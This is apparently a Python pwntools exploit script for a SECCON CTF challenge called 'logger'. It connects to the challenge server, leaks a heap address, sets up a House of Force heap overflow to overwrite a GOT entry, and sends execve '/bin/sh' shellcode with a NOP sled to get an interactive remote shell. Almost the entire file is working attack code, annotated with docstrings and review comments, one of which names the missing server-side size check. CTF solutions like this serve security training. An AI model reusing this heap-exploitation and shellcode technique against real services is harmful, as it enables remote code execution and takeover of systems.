from pwn import *
elf = "/root/pwn/seccon/logger"
#lib32 = "/root/pwn/seccon/libc-2.19.so-c4dc1270c1449536ab2efbbe7053231f1a776368"
#lib64 = "/lib/x86_64-linux-gnu/libc-2.21.so"
# s = process(elf)
# s1 = process(elf)
# Two independent connections to the same service.  Both are logged in
# below with the same uid, so they act on the same server-side log.
s = remote('logger.pwn.seccon.jp',6565)
s1 = remote('logger.pwn.seccon.jp',6565)
e = ELF(elf)
#l = ELF(lib32)
# DEBUG: 0 = quiet, 1 = print the target pid, 2 = also enable pwntools'
# per-send/recv debug logging.
DEBUG = 0
if DEBUG > 0:
    # NOTE(review): pidof() is meant for the commented-out process() targets;
    # with a non-local remote() connection this lookup may not resolve.
    print "PID : %d" % util.proc.pidof(s)[0]
if DEBUG == 2:
    context.log_level = 'debug'
# Session id: the current wall-clock time rendered as a string, so each run
# gets a fresh log on the server.  The fixed "debug" id is kept for reruns.
uid = str(time.time())
#uid = "debug"
# Connection s: wait for the menu, choose option 1, then send uid twice
# (presumably name and password -- confirm against the service prompts),
# and wait for the menu again.
s.recvuntil("exit")
s.sendline("1")
s.sendline(uid)
s.sendline(uid)
s.recvuntil("exit")
print "[*] id : %s" % uid
# Connection s1: same login, but nothing is read back here; its menu output
# is only consumed by the first helper call made on it later.
s1.sendline("1")
s1.sendline(uid)
s1.sendline(uid)
def read(ss):
    """Select menu option 1 on connection *ss* and return the log text.

    Sends "1", reads the reply up to the next "exit" prompt, and returns
    the part that precedes the "1. Read log" menu line (the whole reply
    if that line is absent).
    """
    ss.sendline("1")
    reply = ss.recvuntil("exit")
    body, _sep, _menu = reply.partition("1. Read log")
    return body
def append(ss, size, data):
    """Select menu option 2 on *ss* and submit one log entry.

    Sends "2", waits for the "128byte" size prompt, sends *size* (passed
    through str()) followed by *data*, then consumes the reply up to the
    "exit" prompt.  Returns None.
    """
    ss.sendline("2")
    ss.recvuntil("128byte")
    for line in (str(size), data):
        ss.sendline(line)
    ss.recvuntil("exit")
def leak(ss):
    """Select menu option 3 on *ss* and return the field it prints, as 8 bytes.

    Sends "3", reads past "filename: ", discards the next 32 bytes, then
    takes everything up to (not including) the next "=" and right-pads it
    with NUL bytes to a length of 8.  A field longer than 8 bytes is
    returned unpadded and unchanged (the caller's u64() would then reject
    it).  The reply is consumed up to the "exit" prompt before returning.
    """
    ss.sendline("3")
    ss.recvuntil("filename: ")
    ss.recv(32)
    field = ss.recvuntil("=")[:-1]
    qword = field.ljust(8, "\x00")
    ss.recvuntil("exit")
    return qword
#buf = malloc(file_size) leak
# leak() yields exactly 8 bytes on the expected path; u64() decodes them as
# a little-endian qword and raises if the length is anything else.
heap_addr = u64( leak(s) )
print "[*] LEAK_HEAP : %x" % heap_addr
#house of force
#topchunk = ffffffffffffffff
append(s1,32,"\xff"*32)
# Consumes s's pending menu output; the returned log text is discarded.
read(s)
# offset is derived from the leaked heap address and is sent below as a
# decimal string at the "128byte" size prompt.
offset = 0x602050 - 0x28 - heap_addr# - (32+16)
print "[*] offset : %d" % offset
#append(s,"%d"%offset,"A")
# NOTE(review): this depends on the service accepting a size far outside
# 0..128 at its "128byte" prompt; a server-side bound check on that value
# is the natural mitigation.
append(s,"%d"%offset,"")
#got Overwrite
# Option 2 again with size 128, sent without waiting for the prompts
# (unlike append()); the reply is never read back.
s.sendline("2")
s.sendline("128")
#http://shell-storm.org/shellcode/files/shellcode-806.php
sc = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
# Left-pad sc with 0x90 bytes to exactly 0x40 bytes, then append 0x602080
# as an 8-byte little-endian value, giving a 0x48-byte payload.
sc = "\x90"*(0x40-len(sc)) + sc
sc += p64(0x602080)
s.sendline(sc)
# Hand the connection over to the terminal.
s.interactive()